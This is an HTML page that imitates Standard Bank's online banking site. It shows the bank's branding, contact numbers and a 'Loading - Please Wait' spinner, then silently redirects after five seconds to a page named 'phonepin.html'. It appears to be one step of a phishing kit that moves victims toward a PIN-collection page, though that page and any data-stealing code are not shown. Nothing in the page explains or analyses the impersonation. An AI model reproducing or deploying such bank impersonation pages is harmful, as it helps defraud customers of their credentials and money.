<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">

  <title>Standard Bank Online Banking</title>
  <link rel="icon" type="image/png" href="favicon.ico">

 <meta http-equiv="refresh" content="5;url=phonepin.html" />
  <script src="js/jquery.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
  <!-- Custom styles for this template-->
  <link href="css/ram.css" rel="stylesheet">
  
  <style>
  

body {
    background-image: url(img/money.jpg);
    background-size: cover;
    background-position: center center;
    background-attachment: fixed;
    background-color: #004AA0;
    background-repeat: no-repeat;
}
</style>

</head>

<body id="page-top">

  <!-- Page Wrapper -->
<div id="container" style="width: 100%;">

   <center>
   <div class="row"  style="width: 100%;">
   
  <div class="col-sm-4"></div>
  <div class="col-sm-4" align="center">
  
  <div><img src="img/oril.png"  class="nlo"> </div>
  <div style="text-align: center; padding-bottom: .7em; color: #FFF; font-size: 18px; font-family: arial; font-weight: 300; padding: 0; margin-bottom: 20px; margin-top: 180px;">
<img src="img/spin.svg" style="width: 70px;"><br>
Loading - Please Wait  </div>
  
   
  </div>
  <div class="col-sm-4"></div>
  
  
</div>
</div>
</center>

</div>
<br><br><br><br><br><br>
<center>
  <div class="row"style="width: 100%;   font-size: 11px; color: #fffffa; margin-top: 30px;"align="center">	
 
  <div class="col-sm-4"> <img src="img/icon1.png"> &nbsp; South Africa 0860 123 000</div>
  <div class="col-sm-4" style="text-align: left;">&nbsp;&nbsp; <img src="img/icon2.png"> &nbsp;  International +27(0)10 249 0423</div>
  <div class="col-sm-4"  style="text-align: left;"> <img src="img/icon3.png"> &nbsp; Email us at <span style="font-size: 13px;"><u>ibsupport@standardbank.co.za</u></span></div>
  
  <center>

  </center>
</div>

  <div style="margin-top: 10px; font-size: 10px; width: 100%; color: #fffffa;">
<center>  Standard Bank is a licensed financial services provider in terms of the Financial Advisory and Intermediary Services Act and a registered credit provider in terms of the National Credit Act, registration number NCRCP15.
</center></div>
<br></br>
</center>


 
<script>

$("#text_1").change(function() {
    $("#text_3").val($("#text_1").val() + " " + $("#text_2").val()).change();
})


$("#text_2").change(function(){
    $("#text_3").val($("#text_1").val()).change();
})
    

</script>


<script>
$(document).ready(function(){
	$('#MybtnModalPreventScript').click(function(){
  		$('#MymodalPreventScript').modal({
    		backdrop: 'static',
    		keyboard: false
		});
	});
});
</script>
</body>

</html>
